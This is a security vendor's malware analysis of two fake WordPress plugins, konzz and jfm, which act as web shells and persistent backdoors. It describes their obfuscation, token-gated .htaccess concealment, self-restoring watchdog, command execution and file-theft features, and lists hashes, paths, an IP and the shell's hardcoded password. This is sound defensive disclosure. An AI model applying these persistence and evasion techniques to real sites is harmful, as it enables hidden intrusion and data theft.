JANUARY 12, 2026

New Janus Shell Variations: konzz & jfm

In the ever-evolving landscape of WordPress threats, we’ve recently observed a campaign deploying twin malicious plugins: konzz and jfm. These aren't your typical "bloatware" plugins; they are likely part of a "Web Shell" or a backdoor toolkit often associated with the "Janus" or "IndoXploit" families.

The Anatomy of the "Twin" Threat

The plugins konzz and jfm code uses hexadecimal and octal strings (e.g., \144\151\163\160\154\141\x79) to hide common PHP functions from security scanners that look for keywords like eval or system.

These are the files from the twins:

  • konzz
    • /wp-content/plugins/konzz/konzz.php
    • /wp-content/plugins/konzz/setan.php 
    • /wp-content/plugins/konzz/janus.php
  • jfm
    • /wp-content/plugins/jfm/jfm.php
    • /wp-content/plugins/jfm/janus.php
    • /wp-content/plugins/jfm/setan.php
    • /wp-content/plugins/jfm/xxx-jpg.php
    • /wp-content/plugins/jfm/cancer.php
    • /wp-content/plugins/jfm/jo.php

What is the konzz plugin doing?

konzz: setan.php (the shell)

SHA256 signatures observed during this investigation:

  • 9ee38287ae3e8e8f6b1d95779599a0366b0c130aa5a010f7b4fcf3f6fd6fd1bd
  • 478ec2643026f4862a3f755a04d1cbbb264543e9cb1097c302d501e0af250f8c

This file provides an interactive UI for the hacker to navigate the file system. It uses eval() or system execution functions to run code. The file starts by hiding its tracks and preparing the server for heavy-duty tasks:

  • It disables display_errors so that if something goes wrong, the site owner won't see any suspicious PHP warnings.
  • It attempts to set the memory_limit to -1 (unlimited) and max_execution_time to 0 (infinity). This ensures the malicious script can run large tasks (like DDoS attacks or massive file scanning) without being killed by the server.
  • The script generates a unique security key (the $KbV1u variable).
  • It creates a hidden file on your server starting with .janus_secret_.
  • This token is used as a password. Only a visitor who knows this specific token (passed via a URL parameter like ?janus_token=...) can bypass the security blocks the script is about to set up.
  • The rest of the code creates a massive .htaccess file. While it claims to "protect" the site, it is actually exclusive access control for the attacker:
  • It changes the permissions (chmod 0600) of its secret files so other users on the server cannot read them.
  • It includes rules to ensure that files with extensions like .phtml, .php3, and .phar are handled in ways that allow the attacker to execute code while hiding from the site owner.

konzz: konzz.php (the manager)

SHA256 signatures observed during this investigation:

  • 51dc705fcbaa7cfee4d8becef83366175c6536539344599987a6367a18062182
  • 5852cfad253e86ce7a6b2e776b02d9637ed6caa8d4460a44e18f5cfa5e8458e8
  • 70be80c4b398006b857a217b021360b9dd3e835b83d9ea68732e6511ef5e56d8
  • fc281377392f3827bccb60b5b18f8b24f4eb098f697cf4806ac6401e4038e9f6
  • 196765d70f1f25a1d91f1af2fd5095768134a3a2a054ddf1620479a101a51ca5

While setan.php uses obfuscation to hide its code from Static Analysis (scanners looking at the file's text). It is a "passive" file that waits for instructions. This file, konzz.php uses Active Defense. It doesn't just hide its own code; it changes the server's configuration to block security tools like nmap, sqlmap, and Acunetix. It essentially builds a "moat" around the backdoor. This moat includes a self-healing mechanism that will repair the .htaccess in case it gets modified/cleaned.

Unlike the first one, this file generates a unique cryptographic secret and tells the Apache server: "If a visitor doesn't have this specific token in the URL, pretend this file doesn't exist (403 Forbidden)."

We call this file the manager because it also sets up a "Watchdog" (janus.php) to ensure that even if the connection is lost, the script finishes its work. And often runs as a background process or "cron-like" loop.

konzz: janus.php (the watchdog)

SHA256 signatures observed during this investigation:

  • e2ca0ca3dcd54868f9ad362b5beac60d7e3a19c08e7b53b0a47e07ccff2be940

This file ensures that konzz.php & setan.php are never seen by a firewall or a scanner, and that they are never deleted for long. The code uses @ignore_user_abort(true);. This means even if you delete the file from your FTP, the PHP process might still be "alive" in the server's RAM. It can "ghost-write" the files back onto the disk even after you think they are gone.

Now what is the jfm plugin doing? (the other bad twin)

jfm: jfm.php (the swiss-army toolkit)

SHA256 signatures observed during this investigation:

  • 3705e80ec15c111172bbe2cf18a123857af7ea7eac24cc39348b002b99d4f73f

This plugin is very interesting, while it uses a similar obfuscation technique than konzz, the features are different. See a summary below:

  • Complete File Management: It can browse directories, read, edit, rename, copy, upload, and delete files across the entire server (where permissions allow).
  • Remote Command Execution: It can run system-level commands (via exec, shell_exec, etc.) and even navigate directories using a virtual terminal.
  • System Enumeration: It collects detailed info about the OS, kernel, CPU, RAM, and disk usage.
  • Network Attacks:
    • Port Scanner: Scans other computers or internal networks for open ports.
    • Wget/Download: Downloads malicious payloads directly from other servers to your site.
  • Privilege Escalation Tools: It contains specific commands to find SUID/GUID files, which are often used by hackers to try and gain "Root" (total system) access.
  • Persistence & Stealth:
    • It manages sessions securely to ensure only the attacker can use the interface.
    • It has a "Self-Destruct" feature to delete itself if the attacker thinks they are about to be caught.
    • It can perform "Mass Uploads" to infect multiple directories at once.

jfm: xxx-jpg.php (a simple PHP Webshell)


SHA256 signatures observed during this investigation:

  • 82ed71e52a5b505c310a472a27b86578f173cd7bf4c4f77593faaaa113a325a3
  • 74a7baae08d9ef727f5501842ac5e5ba0dcae32311bd293756084c952393d041
  • 4336ad7f0b208047092cb2cc1f4edcb581cf86ced3911b9eb5a12febf00a0fab
  • 33962308b31f2c48e7de34b4984b0ad01e43782f9203a8583a1fa1c859af6951
  • 2d68d322bc5523779df3541fca58416ce7b7af0c4c80e5375a7e15b17732fb4f

This file is the control panel that allows them to manage your server as if they were sitting at a terminal. Below a run down of its features:

  • The "Stealth" Session Setup. At the very top, it configures PHP session cookies to be extremely secure (HttpOnly, Secure, SameSite=Strict). This isn't for your protection—it's to ensure that once the hacker logs in to this shell, their session cannot be hijacked by anyone else. It also sets an automatic timeout of 1800 seconds (30 minutes).

  • Authentication & Identity. The script identifies itself internally as "1.0-Stealth". It has a hardcoded password:

    Password: hackerterlarang123


The code checks if the user is "authenticated" before allowing any other commands to run. If you don't provide the password, it returns a JSON error.

  • Core Capabilities (The "Command Palette"). The switch ($DK0vL) statement reveals exactly what the attacker can do through this file. They send a "JSON payload" via a POST request, and this script executes it. Below a list of the commands:
    • browse: Acts as a File Explorer. It lists every file and folder, their sizes, owners, and permissions (777, 644, etc.).
    • get_file_content: Allows them to read any file on your server (including wp-config.php or other database credential files).
    • save_file: A powerful File Editor/Uploader. They can overwrite your existing code or upload new malware. It even includes "chunking" logic to bypass server upload limits.
    • exec: This is the most dangerous. It allows them to run system commands directly on your server (like ls, whoami, or wget to download more viruses).
    • delete: Allows them to wipe files or entire directories.
    • zip: Can compress your entire website into a single .zip file for the attacker to download (stealing your entire database and source code).
    • chmod: Can change file permissions to make files writable or executable.

Indicators of Compromise (IOCs)

If you suspect your site is infected, look for the following signatures:

File System Markers

  • /wp-content/plugins/konzz/konzz.php
  • /wp-content/plugins/konzz/setan.php 
  • /wp-content/plugins/konzz/janus.php
  • /wp-content/plugins/jfm/jfm.php
  • /wp-content/plugins/jfm/setan.php
  • /wp-content/plugins/jfm/janus.php
  • /wp-content/plugins/jfm/xxx-jpg.php
  • /wp-content/plugins/jfm/cancer.php
  • /wp-content/plugins/jfm/jo.php
  • Dot files starting with the following patterns .janus_secret, .backup_, .secret
  • .htaccess files containing RewriteCond %{QUERY_STRING} !janus_token=

Network Markers

  • HTTP POST Requests towards any of the files listed earlier.
  • HTTP Requests (GET & POST) with the query string ?janus_token=

IPs observed accessing these fake plugins

  • 182.3.36.10

Note: The specific IP addresses provided above are the ones observed during the investigation. Specific, actionable IPs should be validated with your threat intelligence feeds.

Platform
Solutions
Learn
About
Get Started

Hosting providers around the world save more time and money with Monarx and drive extra revenue by reselling active protection to their customers.

Platform
Agent Installation
Help Docs
Upload Malware
Trust
Privacy Policy
Terms of Service
Responsible Disclosure
Security & Privacy
GDPR Compliance
Mission
Leadership
Press and News
Events
Video and Media 
Brand Guide
© 2026 Monarx. All rights reserved.